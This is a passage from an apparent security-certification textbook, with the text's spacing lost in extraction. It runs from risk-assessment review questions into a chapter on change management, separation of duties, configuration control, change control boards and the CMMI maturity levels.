Forquestions5and6,assumethefollowing:Theassetvalueofasmalldistributionwarehouseis$5million,andthiswarehouseservesasabackupfacility.Itscompletedestructionbyadisasterwouldtakeawayabout1/5ofthecapabilityofthebusiness.Alsoassumethatthissortofdisasterisexpectedtooccuraboutonceevery50years.
5.Whichofthefollowingisthecalculatedsinglelossexpectancy(SLE)?
A.SLE=$25million
B.SLE=$1million
C.SLE=$2.5million
D.SLE=$5million
6.Whichofthefollowingisthecalculatedannualizedlossexpectancy(ALE)?
A.ALE=$50,000
B.ALE=$1million
C.ALE=$20,000
D.ALE=$50million
7.Whendiscussingqualitativeriskassessmentversusquantitativeriskassessment,whichofthefollowingistrue?
A.Itisimpossibletoconductapurelyquantitativeriskassessment,anditisimpossibletoconductapurelyqualitativeriskassessment.
B.Itispossibletoconductapurelyquantitativeriskassessment,
butitisimpossibletoconductapurelyqualitativeriskassessment.
C.Itisimpossibletoconductapurelyquantitativeriskassessment,butitispossibletoconductapurelyqualitativeriskassessment.
D.Itispossibletoconductapurelyquantitativeriskassessment,anditispossibletoconductapurelyqualitativeriskassessment.
8.Whichofthefollowingcorrectlydefinesresidualrisk?A.Theriskstillremainingafteraniterationofriskmanagement
B.Thepossibilityofsufferingaloss
C.Theresultofavulnerabilitybeingexploitedbyathreatthatresultsinaloss
D.Characteristicsofanassetthatcanbeexploitedbyathreattocauseharm
9.Whichofthefollowingstatementsaboutriskistrue?A.Amanagercanaccepttherisk,whichwillreducetherisk.
B.Theriskitselfdoesn’treallychange.However,actionscanbetakentoreducetheimpactoftherisk.
C.Amanagercantransfertherisk,whichwillreducetherisk.
D.Amanagercantakestepstoincreasetherisk.
10.Fillintheblanks.AvailabilityiscalculatedusingtheformulaAvailability=A/(B+C)
A=________
B=________
C=________
EssayQuiz1.Youaredraftingane-mailtoyourriskmanagementteammembers
toexplainthedifferencebetweentangibleassetsandintangibleassets.Relatepotentialthreatsandrisktotangibleandintangibleimpacts.Writeashortparagraphthatexplainsthedifferenceandincludetwoexamplesofeach.
2.Youhavebeentaskedtoinitiateariskmanagementprogramforyourcompany.TheCEOhasjustaskedyoutosuccinctlyexplaintherelationshipbetweenimpact,threat,andvulnerability.Thinkquickonyourfeetandgiveasinglesentencethatexplainstherelationship.
3.YourCEOnowsays,“Youmentionedthatrisksalwaysexist.IfItakeenoughmeasures,can’tIeliminatetherisk?”Explainwhyrisksalwaysexist.
4.Youareexplainingyourriskmanagementplantoanewteammemberjustbroughtonaspartofacollegeinternshipprogram.Theinternasks,“Withrespecttoimpact,whatdoesathreatdotoarisk?”Howwouldyouanswer?
5.TheinternmentionedinQuestion4nowasksyoutocompareandcontrastacceptingrisk,transferringrisk,andmitigatingrisk.What’syourresponse?
LabProjects
•LabProject20.1Theassetvalueofadistributioncenter(locatedinthemidwesternUnitedStates)andits
inventoryis$10million.Itisoneoftwoidenticalfacilities(theotherisinthesouthwesternUnitedStates).Itscompletedestructionbyadisasterwouldthustakeawayhalfofthecapabilityofthebusiness.Alsoassumethatthissortofdisasterisexpectedtooccuraboutonceevery100years.Fromthis,calculatetheannualizedlossexpectancy.
•LabProject20.2Youhavejustcompletedaqualitativethreatassessmentofthecomputersecurityofyourorganization,withtheimpactsandprobabilitiesofoccurrencelistedinthetablethatfollows.Properlyplacethethreatsina3-by-3tablesimilartothatinFigure20.5.Whichofthethreatsshouldyoutakeactionon,whichshouldyoumonitor,andwhichonesmaynotneedyourimmediateattention?
chapter21 ChangeManagement
Itisnotthestrongestofthespeciesthatsurvive,northemostintelligent,buttheonemostresponsivetochange.
I
—CHARLESDARWIN
Inthischapter,youwilllearnhowto
Usechangemanagementasanimportantenterprisemanagementtool
Institutethekeyconceptofseparationofduties
Identifytheessentialelementsofchangemanagement
Implementchangemanagement
UsetheconceptsoftheCapabilityMaturityModelIntegration
tiswellrecognizedthattoday’scomputersystemsareextremelycomplex,anditisobviousthatinventorymanagementsystemsforlargeinternationalenterprisessuchasWal-MartandHomeDepotare
probablyascomplexasanaircraftorskyscraper.ProminentoperatingsystemssuchasWindowsandUNIXarealsoverycomplex,asarecomputerprocessorsonachip.Manyoftoday’sweb-basedapplicationsareextremelycomplexaswell.Forexample,today’sweb-basedapplicationstypicallyconsistofflashcontentonwebsitesinteractingwithremotedatabasesthroughavarietyofservicesorservice-orientedarchitectureshostedonwebserverslocatedanywhereintheworld.Youwouldn’tthinkofconstructinganaircraft,largebuilding,computer
chip,orautomobileintheinformalmannersometimesusedtodevelopandoperatecomputersystemsofequalcomplexity.Computersystemshavegrowntobesocomplexandmission-criticalthatenterprisescannotaffordtodevelopandmaintaintheminanadhocmanner.
Changemanagementprocedurescanaddstructureandcontroltothedevelopmentandmanagementoflargesoftwaresystemsastheymovefromdevelopmenttoimplementationandduringoperation.Inthischapter,changemanagementreferstoastandardmethodologyforperformingandrecordingchangesduringsoftwaredevelopmentandsystemoperation.Themethodologydefinesstepsthatensurethatsystemchangesarerequiredbytheorganizationandareproperlyauthorized,documented,tested,and
approvedbymanagement.Inmanyconversations,thetermconfigurationmanagementisconsideredsynonymouswithchangemanagementand,inamorelimitedmanner,versioncontrolorreleasecontrol.Thetermchangemanagementisoftenappliedtothemanagementof
changesinthebusinessenvironment,typicallyasaresultofbusinessprocessreengineeringorqualityenhancementefforts.Thetermchangemanagementasusedinthischapterisdirectlyrelatedtomanagingandcontrollingsoftwaredevelopment,maintenance,andsystemoperation.Configurationmanagementistheapplicationofchangemanagementprinciplestoconfigurationofbothsoftwareandhardware.
WhyChangeManagement?Tomanagethesystemdevelopmentandmaintenanceprocesseseffectively,youneeddisciplineandstructuretohelpconserveresourcesandenhanceeffectiveness.Changemanagement,likeriskmanagement,isoftenconsideredexpensive,nonproductive,unnecessary,andconfusing—animpedimenttoprogress.However,likeriskmanagement,changemanagementcanbescaledtocontrolandmanagethedevelopmentandmaintenanceofsystemseffectively.
CrossCheckRiskManagementandChangeManagementAreEssentialBusinessProcessesChapter20presentedriskmanagementasanessentialdecision-makingprocess.Inmuchthesameway,changemanagementisanessentialpracticeformanagingasystemduringitsentirelifecycle,fromdevelopmentthroughdeploymentandoperation,untilitistakenoutofservice.Whatsecurity-specificrisk-basedquestionsshouldbeaskedduringchangemanagementreviews?
Changemanagementshouldbeusedinallphasesofasystem’slife:development,testing,qualityassurance(QA),andproduction.Shortdevelopmentcycleshavenotchangedtheneedforanappropriateamount
ofmanagementcontroloversoftwaredevelopment,maintenance,andoperation.Infact,shortturnaroundtimesmakechangemanagementmorenecessary,becauseonceasystemgoesactiveintoday’sservices-basedenvironments,itoftencannotbetakenofflinetocorrecterrors—itmuststayupandonlineorbusinesswillbelostandbrandrecognitiondamaged.Intoday’svolatilestockmarket,forexample,evensmallindicatorsoflaggingperformancecanhavedramaticimpactsonacompany’sstockvalue.Thefollowingscenariosexemplifytheneedforappropriatechange
managementpolicyandforproceduresoversoftware,hardware,anddata:
Thedeveloperscan’tfindthelatestversionoftheproductionsourcecode.Changemanagementpracticessupportversioningofsoftwarechanges.
Abugcorrectedafewmonthsagomysteriouslyreappears.Properchangemanagementensuresdevelopersalwaysusethemostrecentlychangedsourcecode.
Fieldedsoftwarewasworkingfineyesterdaybutdoesnotworkproperlytoday.Goodchangemanagementcontrolsaccesstopreviouslymodifiedmodulessothatpreviouslycorrectederrorsaren’treintroducedintothesystem.
Developmentteammembersoverwroteeachother’schanges.Today’schangemanagementtoolssupportcollaborativedevelopment.
Aprogrammerspentseveralhourschangingthewrongversionofthesoftware.Changemanagementtoolssupportviablemanagementofprevioussoftwareversions.
Newtaxratesstoredinatablehavebeenoverwrittenwithlastyear’staxrates.Changecontrolpreventsinadvertentoverwritingofcriticalreferencedata.
Anetworkadministratorinadvertentlybringsdownaserverasheincorrectlypuncheddownthewrongwires.Justlikeablueprintshows
keyelectricalpaths,datacenterconnectionpathscanbeversion-controlled.
Anewlyinstalledserverishackedsoonafterinstallationbecauseitisimproperlyconfigured.Networkandsystemadministratorsusechangemanagementtoensureconfigurationsconsistentlymeetsecuritystandards.
TryThis!
ScopeofChangeManagementSeeifyoucanexplainwhyeachofthefollowingshouldbeplacedunderanappropriatechangemanagementprocess:
WebpagesServicepacks
SecuritypatchesThird-partysoftwarereleases
TestdataandtestscriptsParameterfiles
Scripts,storedprocedures,orjobcontrollanguage–typeprogramsCustomizedvendorcode
SourcecodeofanykindApplications
TechTip
TypesofChangesTheITILv3GlossaryofTerms,DefinitionsandAcronyms(https://www.axelos.com/glossaries-of-terms)definesthefollowingtypesofchanges(withexamplesaddedinparentheses):
Change“Theaddition,modificationorremovalofanythingthatcouldhaveaneffect
onITServices.”(Forexample,themodificationtoamoduletoimplementanewcapability.)
StandardChange“Apreapprovedchangethatislowrisk,relativelycommonandfollowsaprocedureorworkinstruction.”(Forexample,eachmonthfinancemustmakeasmallroundingadjustmenttoreconciletheGeneralLedgertoaccountforforeigncurrencycalculations.)
EmergencyChange“Achangethatmustbeintroducedassoonaspossible.”(Forexample,toresolveamajorincidentorimplementasecuritypatch.Thechangemanagementprocesswillnormallyhaveaspecificprocedureforhandlingemergencychanges.)
Seehttps://www.axelos.com/best-practice-solutions/itil.aspxformoreinformation.
Justaboutanyonewithmorethanayear’sexperienceinsoftwaredevelopmentorsystemoperationscanrelatetoatleastoneoftheprecedingscenarios.However,eachofthesescenarioscanbecontrolled,andimpactsmitigated,throughproperchangemanagementprocedures.TheSarbanes-OxleyActof2002,officiallyentitledthePublicCompany
AccountingReformandInvestorProtectionActof2002,wasenactedJuly30,2002,tohelpensuremanagementestablishesviablegovernanceenvironmentsandcontrolstructurestoensureaccuracyoffinancialreporting.Section404outlinestherequirementsmostapplicabletoinformationtechnology.ChangemanagementisanessentialpartofcreatingaviablegovernanceandcontrolstructureandcriticaltocompliancewiththeSarbanes-OxleyAct.
TheKeyConcept:SeparationofDutiesAfoundationforchangemanagementistherecognitionthatinvolvingmorethanoneindividualinaprocesscanreducerisk.Goodbusinesscontrolpracticesrequirethatdutiesbeassignedtoindividualsinsuchawaythatnooneindividualcancontrolallphasesofaprocessortheprocessingandrecordingofatransaction.Thisiscalledseparationofduties(alsocalledsegregationofduties).Itisanimportantmeansbywhicherrorsandfraudulentormaliciousactscanbediscouragedand
prevented.Separationofdutiescanbeappliedinmanyorganizationalscenariosbecauseitestablishesabasisforaccountabilityandcontrol.Properseparationofdutiescansafeguardenterpriseassetsandprotectagainstrisks.Theyshouldbedocumented,monitored,andenforced.Awell-understoodbusinessexampleofseparationofdutiesisinthe
managementandpaymentofvendorinvoices.Ifapersoncancreateavendorinthefinancesystem,enterinvoicesforpayment,andthenauthorizeapaymentchecktobewritten,itisapparentthatfraudcouldbeperpetratedbecausethepersoncouldwriteachecktohimselfforservicesneverperformed.Separatingdutiesbyrequiringonepersontocreatethevendorsandanotherpersontoenterinvoicesandwritechecksmakesitmoredifficultforsomeonetodefraudanemployer.Informationtechnology(IT)organizationsshoulddesign,implement,
monitor,andenforceappropriateseparationofdutiesfortheenterprise’sinformationsystemsandprocesses.Today’scomputersystemsarerapidlyevolvingintoanincreasinglydecentralizedandnetworkedcomputerinfrastructure.IntheabsenceofadequateITcontrols,suchrapidgrowthmayallowexploitationoflargeamountsofenterpriseinformationinashorttime.Further,theknowledgeofcomputeroperationsheldbyITstaffissignificantlygreaterthanthatofanaverageuser,andthisknowledgecouldbeabusedformaliciouspurposes.Someofthebestpracticesforensuringproperseparationofdutiesinan
ITorganizationareasfollows:
Separationofdutiesbetweendevelopment,testing,QA,andproductionshouldbedocumentedinwrittenproceduresandimplementedbysoftwareormanualprocesses.
Programdevelopers’andprogramtesters’activitiesshouldbeconductedon“test”dataonly.Theyshouldberestrictedfromaccessing“live”productiondata.Thiswillassistinensuringanindependentandobjectivetestingenvironmentwithoutjeopardizingtheconfidentialityandintegrityofproductiondata.
Endusersorcomputeroperationspersonnelshouldnothavedirect
accesstoprogramsourcecode.Thiscontrolhelpslessentheopportunityofexploitingsoftwareweaknessesorintroducingmaliciouscode(orcodethathasnotbeenproperlytested)intotheproductionenvironmenteitherintentionallyorunintentionally.
Functionsofcreating,installing,andadministratingsoftwareprogramsshouldbeassignedtodifferentindividuals.Forexample,sincedeveloperscreateandenhanceprograms,theyshouldnotbeabletoinstallitontheproductionsystem.Likewise,databaseadministratorsshouldnotbeprogramdevelopersondatabasesystemstheyadminister.
Allaccessesandprivilegestosystems,software,ordatashouldbegrantedbasedontheprincipleofleastprivilege,whichgivesusersnomoreprivilegesthanarenecessarytoperformtheirjobs.Accessprivilegesshouldbereviewedregularlytoensurethatindividualswhonolongerrequireaccesshavehadtheiraccessremoved.
Formalchangemanagementpolicyandproceduresshouldbeenforcedthroughouttheenterprise.Anychangesinhardwareandsoftwarecomponents(includingemergencychanges)thatareimplementedafterthesystemhasbeenplacedintoproductionmustgothroughtheapprovedformalchangemanagementmechanism.
TechTip
StepstoImplementSeparationofDuties
1.Identifyanindispensablefunctionthatispotentiallysubjecttoabuse.2.Dividethefunctionintoseparatesteps,eachcontainingasmallpartofthepowerthat
enablesthefunctiontobeabused.
3.Assigneachsteptoadifferentpersonororganization.
Managersatalllevelsshouldreviewexistingandplannedprocessesand
systemstoensureproperseparationofduties.Smallerbusinessentitiesmaynothavetheresourcestoimplementalloftheprecedingpracticesfully,butothercontrolmechanisms,includinghiringqualifiedpersonnel,bondingcontractors,andusingtraining,monitoring,andevaluationpractices,canreduceanyorganization’sexposuretorisk.Theestablishmentofsuchpracticescanensurethatenterpriseassetsareproperlysafeguardedandcanalsogreatlyreduceerrorandthepotentialforfraudulentormaliciousactivities.Changemanagementpracticesimplementandenforceseparationof
dutiesbyaddingstructureandmanagementoversighttothesoftwaredevelopmentandsystemoperationprocesses.Changemanagementtechniquescanensurethatonlycorrectandauthorizedchanges,asapprovedbymanagementorotherauthorities,areallowedtobemade,followingadefinedprocess.
TechTip
ChangeManagementTheITILv3Glossarydefineschangemanagementas“Theprocessresponsibleforcontrollingthelifecycleofallchanges.Theprimaryobjectiveofchangemanagementistoenablebeneficialchangestobemade,withminimumdisruptiontoITservices.”Seehttps://www.axelos.com/glossaries-of-terms.
ElementsofChangeManagementChangemanagementhasitsrootsinsystemengineering,whereitiscommonlyreferredtoasconfigurationmanagement.Mostoftoday’ssoftwareandhardwarechangemanagementpracticesderivefromlong-standingsystemengineeringconfigurationmanagementpractices.Computerhardwareandsoftwaredevelopmenthaveevolvedtothepointthatpropermanagementstructureandcontrolsmustexisttoensuretheproductsoperateasplanned.IssuessuchastheHeartbleedandShellshockincidentsillustratetheneedtounderstandconfigurationsandchange.
Changemanagementandconfigurationmanagementusedifferenttermsfortheirvariousphases,buttheyallfitintothefourgeneralphasesdefinedunderconfigurationmanagement:
Configurationidentification
Configurationcontrol
Configurationstatusaccounting
Configurationauditing
Configurationidentificationistheprocessofidentifyingwhichassetsneedtobemanagedandcontrolled.Theseassetscouldbesoftwaremodules,testcasesorscripts,tableorparametervalues,servers,majorsubsystems,orentiresystems.Theideaisthat,dependingonthesizeandcomplexityofthesystem,anappropriatesetofdataandsoftware(orotherassets)mustbeidentifiedandproperlymanaged.Theseidentifiedassetsarecalledconfigurationitemsorcomputersoftwareconfigurationitems.Relatedtoconfigurationidentification,andtheresultofit,isthe
definitionofabaseline.Abaselineservesasafoundationforcomparisonormeasurement.Itprovidesthenecessaryvisibilitytocontrolchange.Forexample,asoftwarebaselinedefinesthesoftwaresystemasitisbuiltandrunningatapointintime.Asanotherexample,networksecuritybestpracticesclearlystatethatanylargeorganizationshouldbuilditsserverstoastandardbuildconfigurationtoenhanceoverallnetworksecurity.Theserversaretheconfigurationitems,andthestandardbuildistheserverbaseline.Configurationcontrolistheprocessofcontrollingchangestoitems
thathavebeenbaselined.Configurationcontrolensuresthatonlyapprovedchangestoabaselineareallowedtobeimplemented.Itiseasytounderstandwhyasoftwaresystem,suchasaweb-basedorderentrysystem,shouldnotbechangedwithoutpropertestingandcontrol—otherwise,thesystemmightstopfunctioningatacriticaltime.
Configurationcontrolisakeystepthatprovidesvaluableinsighttomanagers.Ifasystemisbeingchanged,andconfigurationcontrolisbeingobserved,managersandothersconcernedwillbebetterinformed.Thisensuresproperuseofassetsandavoidsunnecessarydowntimeduetotheinstallationofunapprovedchanges.
Largeenterpriseapplicationsystemsrequireviablechangemanagementsystems.Forexample,SAPhasitsownchangemanagementsystemcalledtheTransportManagementSystem(TMS).Third-partysoftwaresuchasPhireArchitect(www.phire-soft.com)andStatforPeopleSoft(http://software.dell.com/products/stat-peoplesoft/)providechangemanagementapplicationsforOracle’sPeopleSoftorE-BusinessSuite.
Configurationstatusaccountingconsistsoftheproceduresfortrackingandmaintainingdatarelativetoeachconfigurationiteminthebaseline.Itiscloselyrelatedtoconfigurationcontrol.Statusaccountinginvolvesgatheringandmaintaininginformationrelativetoeachconfigurationitem.Forexample,itdocumentswhatchangeshavebeenrequested;whatchangeshavebeenmade,when,andforwhatreason;whoauthorizedthechange;whoperformedthechange;andwhatotherconfigurationitemsorsystemswereaffectedbythechange.
Itisimportantthatyouunderstandthateventhoughallserversmaybeinitiallyconfiguredtothesamebaseline,individualapplicationsmightrequireasystem-specificconfigurationtorunproperly.Changemanagementactuallyfacilitatessystem-specificconfigurationinthatallexceptionsfromthestandardconfigurationaredocumented.Allpeopleinvolvedinmanagingandoperatingthesesystemswillhavedocumentationtohelpthemquicklyunderstandwhyaparticularsystemisconfiguredinauniqueway.
Returningtoourexampleofserversbeingbaselined,iftheoperatingsystemofthoseserversisfoundtohaveasecurityflaw,thenthebaselinecanbeconsultedtodeterminewhichserversarevulnerabletothis
particularsecurityflaw.Thosesystemswiththisweaknesscanbeupdated(andonlythosethatneedtobeupdated).Configurationcontrolandconfigurationstatusaccountinghelpensurethatsystemsaremoreconsistentlymanagedand,ultimatelyinthiscase,theorganization’snetworksecurityismaintained.Itiseasytoimaginethestateofanorganizationthathasnotbuiltallserverstoacommonbaselineandhasnotproperlycontrolleditssystems’configurations.Itwouldbeverydifficulttoknowtheconfigurationofindividualservers,andsecuritycouldquicklybecomeweak.Configurationauditingistheprocessofverifyingthatthe
configurationitemsarebuiltandmaintainedaccordingtotherequirements,standards,orcontractualagreements.Itissimilartohowauditsinthefinancialworldareusedtoensurethatgenerallyacceptedaccountingprinciplesandpracticesareadheredtoandthatfinancialstatementsproperlyreflectthefinancialstatusoftheenterprise.Configurationauditsensurethatpoliciesandproceduresarebeingfollowed,thatallconfigurationitems(includinghardwareandsoftware)arebeingproperlymaintained,andthatexistingdocumentationaccuratelyreflectsthestatusofthesystemsinoperation.Configurationauditingtakesontwoforms:functionalandphysical.A
functionalconfigurationauditverifiesthattheconfigurationitemperformsasdefinedbythedocumentationofthesystemrequirements.Aphysicalconfigurationauditconfirmsthatallconfigurationitemstobeincludedinarelease,install,change,orupgradeareactuallyincluded,andthatnoadditionalitemsareincluded—nomore,noless.
ImplementingChangeManagementChangemanagementrequiressomestructureanddisciplineinordertobeeffective.Thechangemanagementfunctionisscalablefromsmalltoenterprise-levelprojects.Figure21.1illustratesasamplesoftwarechangemanagementflowappropriateformediumtolargeprojects.Itcanbeadaptedtosmallorganizationsbyhavingthedeveloperperformworkonly
onherworkstation(neverontheproductionsystem)andhavingthesystemadministratorserveinthebuildmasterfunction.Thebuildmasterisusuallyanindependentpersonresponsibleforcompilingandincorporatingchangedsoftwareintoanexecutableimage.
•Figure21.1Softwarechangecontrolworkflow
TechTip
ReleaseManagementTheITILv3Glossarydefinesreleasemanagementas“Theprocessresponsibleforplanning,schedulingandcontrollingthemovementofreleasestotestandliveenvironments.Theprimaryobjectiveofreleasemanagementistoensurethattheintegrityoftheliveenvironmentisprotectedandthatthecorrectcomponentsarereleased.”Seehttps://www.axelos.com/glossaries-of-terms.
Figure21.1showsthatdevelopersneverhaveaccesstotheproductionsystemordata.Italsodemonstratesproperseparationofdutiesbetweendevelopers,QAandtestpersonnel,andproduction.Itimpliesthatadistinctseparationexistsbetweendevelopment,testingandQA,andproductionenvironments.Thisworkflowisforchangesthathaveamajorimpactonproductionorthecustomer’sbusinessprocess.Forminorchangesthathaveminimalriskorimpactonbusinessprocesses,someofthestepsmaybeomitted.Thechangemanagementworkflowproceedsasfollows:
1.Thedeveloperchecksoutsourcecodefromthecode-controltoolarchivetothedevelopmentsystem.
2.Thedevelopermodifiesthecodeandconductsunittestingofthechangedmodules.
3.Thedeveloperchecksthemodifiedcodeintothecode-controltoolarchive.
4.Thedevelopernotifiesthebuildmasterthatchangesarereadyforanewbuildandtesting/QA.
5.Thebuildmastercreatesabuildincorporatingthemodifiedcodeandcompilesthecode.
6.Thebuildmasternotifiesthesystemadministratorthattheexecutableimageisreadyfortesting/QA.
7.Thesystemadministratormovestheexecutablestothetest/QAsystem.
8.QAteststhenewexecutables.Ifthetestsarepassed,test/QAnotifiesthemanager.Iftestsfail,theprocessstartsover.
9.Uponmanagerapproval,thesystemadministratormovestheexecutabletotheproductionsystem.
TechTip
IdentifyingSeparationofDutiesUsingFigure21.1,observetheseparationofdutiesbetweendevelopment,test/QA,andproduction.Thefunctionsofcreating,installing,andadministratingareassignedtodifferentindividuals.Notealsoappropriatemanagementreviewandapproval.Thisimplementationalsoensuresthatnocompilerisnecessaryontheproductionsystem.Indeed,compilersshouldnotbeallowedtoexistontheproductionsystem.
BackoutPlanOneofthekeyelementsofachangeplanisacomprehensivebackoutplan.Ifinthecourseofaplannedchangeactivityinproductionaproblemoccursthatpreventsgoingforward,itisessentialtohaveabackoutplantorestorethesystemtoitspreviousoperatingcondition.Acommonelementinmanyoperatingsystemupdatesistheinabilitytogobacktoapreviousversion.Thisisfineprovidedthattheupdategoesperfectly,butifforsomereasonitfails,whatthen?Forapersonaldevice,theremaybesomeinconvenience.Foraserverinproduction,thiscanhavesignificantbusinessimplications.Theultimateinbackoutplansistherestorationofacompletebackupofthesystem.Backupscanbetimeconsuminganddifficultinsomeenvironments,butthespreadofvirtualizationintotheenterpriseprovidesmanymoreoptionsinconfigurationmanagementandbackoutplans.
ThePurposeofaChangeControlBoard
Tooverseethechangemanagementprocess,mostorganizationsestablishachangecontrolboard(CCB).Inpractice,aCCBnotonlyfacilitatesadequatemanagementoversight,butalsofacilitatesbettercoordinationbetweenprojects.TheCCBconvenesonaregularbasis,usuallyweeklyormonthly,andcanbeconvenedonanemergencyoras-neededbasisaswell.Figure21.2showstheprocessforimplementingandproperlycontrollinghardwareorsoftwareduringchanges.
•Figure21.2Changecontrolboardprocess
TheCCB’smembershipshouldconsistofdevelopmentprojectmanagers,networkadministrators,systemadministrators,test/QAmanagers,aninformationsecuritymanager,anoperationscentermanager,andahelpdeskmanager.Otherscanbeaddedasnecessary,dependingonthesizeandcomplexityoftheorganization.
TechTip
IncidentManagementTheITILv3Glossarydefinesincidentmanagementas“Theprocessresponsibleformanagingthelifecycleofallincidents.TheprimaryobjectiveofincidentmanagementistoreturntheITservicetousersasquicklyaspossible.”
Asystemproblemreport(SPR)isusedtotrackchangesthroughtheCCB.TheSPRdocumentschangesorcorrectionstoasystem.Itreflectswhorequestedthechangeandwhy,whatanalysismustbedoneandbywhom,andhowthechangewascorrectedorimplemented.Figure21.3showsasampleSPR.Mostlargeenterprisescannotrelyonapaper-basedSPRprocessandinsteaduseoneofthemanysoftwaresystemsavailabletoperformchangemanagementfunctions.Whilethisexampleshowsapaper-basedSPR,itcontainsalltheelementsofchangemanagement:itdescribestheproblemandwhoreportedit,itoutlinesresolutionoftheproblem,anditdocumentsapprovalofthechange.
•Figure21.3Samplesystemproblemreport
Figure21.4showstheentirechangemanagementprocessanditsrelationshiptoincidentmanagementandreleasemanagement.
•Figure21.4Change,incident,andreleasemanagement
CodeIntegrityOnekeybenefitofadequatechangemanagementistheassuranceofcodeconsistencyandintegrity.Wheneveramodifiedprogramismovedtotheproductionsource-codelibrary,theexecutableversionshouldalsobemovedtotheproductionsystem.Automatedchangemanagementsystemsgreatlysimplifythisprocessandarethereforebettercontrolsforensuringexecutableandsource-codeintegrity.Rememberthatatnotimeshouldtheuserorapplicationdeveloperhaveaccesstoproductionsourceandexecutablecodelibrariesintheproductionenvironment.Finally,intoday’snetworkedenvironment,theintegrityofthe
executablecodeiscritical.Acommonhackingtechniqueistoreplacekeysystemexecutablecodewithmodifiedcodethatcontainsbackdoors,allowingunauthorizedaccessorfunctionstobeperformed.Executablecodeintegritycanbeverifiedusinghost-basedintrusiondetectionsystems.Thesesystemscreateandmaintainadatabaseofthesizeandcontentofexecutablemodules.Conceptually,thisisusuallydonebyperformingsomekindofhashingorsophisticatedchecksumoperationontheexecutablemodulesandstoringtheresultsinadatabase.Theoperationisperformedonaregularscheduleagainsttheexecutablemodules,andtheresultsarecomparedtothedatabasetoidentifyanyunauthorizedchangesthatmayhaveoccurredtotheexecutablemodules.
TheCapabilityMaturityModelIntegrationAnimportantsetofprocessmodelsaretheCapabilityMaturityModelIntegration(CMMI)seriesdevelopedatCarnegieMellonUniversity’sSoftwareEngineeringInstitute(SEI).SEIhascreatedthreecapabilitymaturitymodelintegrationsthatreplacetheolderCapabilityMaturityModel(CMM):theCapabilityMaturityModelIntegrationforAcquisition(CMMI-ACQ),theCapabilityMaturityModelIntegrationforDevelopment(CMMI-DEV),andtheCapabilityMaturityModelIntegrationforServices(CMMI-SVC).CMMI-DEVisrepresentativeofthethreemodels.OneofthefundamentalconceptsofCMMI-DEVisconfigurationorchangemanagement,whichprovidesorganizationswiththeabilitytoimprovetheirsoftwareandotherprocessesbyprovidinganevolutionarypathfromadhocprocessestodisciplinedmanagementprocesses.TheCMMI-DEVdefinesfivematuritylevels:
Level1:InitialAtmaturitylevel1,processesaregenerallyadhocandchaotic.Theorganizationdoesnotprovideastableenvironmenttosupportprocesses.
Level2:ManagedAtmaturitylevel2,processesareplannedandexecutedinaccordancewithpolicy.Theprojectsemployskilledpeoplewhohaveadequateresourcestoproducecontrolledoutputs;involverelevantstakeholders;aremonitored,controlled,andreviewed;andareevaluatedforadherencetotheirprocessdescriptions.
Level3:DefinedAtmaturitylevel3,processesarewellcharacterizedandunderstood,andaredescribedinstandards,procedures,tools,andmethods.Thesestandardprocessesareusedtoestablishconsistencyacrosstheorganization.
Level4:QuantitativelyManagedAtmaturitylevel4,theorganizationestablishesquantitativeobjectivesforqualityandprocessperformanceandusesthemascriteriainmanagingprojects.Quantitativeobjectivesarebasedontheneedsofthecustomer,endusers,organization,andprocessimplementers.Qualityandprocessperformanceisunderstoodinstatisticaltermsandismanagedthroughoutthelifeofprojects.
Level5:OptimizingAtmaturitylevel5,anorganizationcontinuallyimprovesitsprocessesbasedonaquantitativeunderstandingofitsbusinessobjectivesandperformanceneeds.Theorganizationusesaquantitativeapproachtounderstandingthevariationinherentintheprocessandthecausesofprocessoutcomes.
ExamTip:TocompleteyourpreparationsfortheCompTIASecurity+exam,itisrecommendedthatyouconsultSEI’swebsite(www.sei.cmu.edu)forspecificCMMIdefinitions.BesurethatyouunderstandthedifferencesbetweencapabilitylevelsandmaturitylevelsasdefinedinCMMI.
ChangemanagementisakeyprocesstoimplementingtheCMMI-DEVinanorganization.Forexample,ifanorganizationisatCMMI-DEVlevel1,itprobablyhasminimalformalchangemanagementprocessesinplace.
Atlevel3,anorganizationhasadefinedchangemanagementprocessthatisfollowedconsistently.Atlevel5,thechangemanagementprocessisaroutine,quantitativelyevaluatedpartofimprovingsoftwareproductsandimplementinginnovativeideasacrosstheorganization.Foranorganizationtomanagesoftwaredevelopment,operation,andmaintenance,itshouldhaveeffectivechangemanagementprocessesinplace.Changemanagementisanessentialmanagementtoolandcontrol
mechanism.Theconceptofsegregationofdutiesensuresthatnosingleindividualororganizationpossessestoomuchcontrolinaprocess,helpingtopreventerrorsandfraudulentormaliciousacts.Theelementsofchangemanagement—configurationidentification,configurationcontrol,configurationstatusaccounting,andconfigurationauditing—coupledwithadefinedprocessandachangecontrolboard,willprovidemanagementwithproperoversightofthesoftwarelifecycle.Oncesuchaprocessandmanagementoversightexists,thecompanycanuseCMMI-DEVtomovefromadhocactivitiestoadisciplinedsoftwaremanagementprocess.
Chapter21Review
ChapterSummaryAfterreadingthischapterandcompletingtheexercises,youshouldunderstandthefollowingaboutchangemanagement.
Usechangemanagementasanimportantenterprisemanagementtool
Changemanagementshouldbeusedinallphasesofthesoftwarelifecycle.
Changemanagementcanbescaledtoeffectivelycontrolandmanagesoftwaredevelopmentandmaintenance.
Changemanagementcanpreventsomeofthemostcommonsoftwaredevelopmentandmaintenanceproblems.
Institutethekeyconceptofseparationofduties
Separationofdutiesensuresthatnosingleindividualororganizationpossessestoomuchcontrolinaprocess.
Separationofdutieshelpspreventerrorsandfraudulentormaliciousacts.
Separationofdutiesestablishesabasisforaccountabilityandcontrol.
Separationofdutiescanhelpsafeguardenterpriseassetsandprotectagainstrisks.
Identifytheessentialelementsofchangemanagement
Configurationidentificationidentifiesassetsthatneedtobecontrolled.
Configurationcontrolkeepstrackofchangestoconfigurationitemsthathavebeenbaselined.
Configurationstatusaccountingtrackseachconfigurationiteminthebaseline.
Configurationauditingverifiestheconfigurationitemsarebuiltandmaintainedappropriately.
Implementchangemanagement
Astandardizedprocessandachangecontrolboardprovidemanagementwithproperoversightandcontrolofthesoftwaredevelopmentlifecycle.
Agoodchangemanagementprocesswillexhibitgoodseparationofdutiesandhaveclearlydefinedroles,responsibilities,andapprovals.
Aneffectivechangecontrolboardfacilitatesgoodmanagementoversightandcoordinationbetweenprojects.
UsetheconceptsoftheCapabilityMaturityModelIntegration
Oncepropermanagementoversightexists,thecompanywillbeabletouseCMMItohelptheorganizationmovefromadhocactivitiestoadisciplinedsoftwaremanagementprocess.
CMMIreliesheavilyonchangemanagementtoprovideorganizationswiththecapabilitytoimprovetheirsoftwareprocesses.
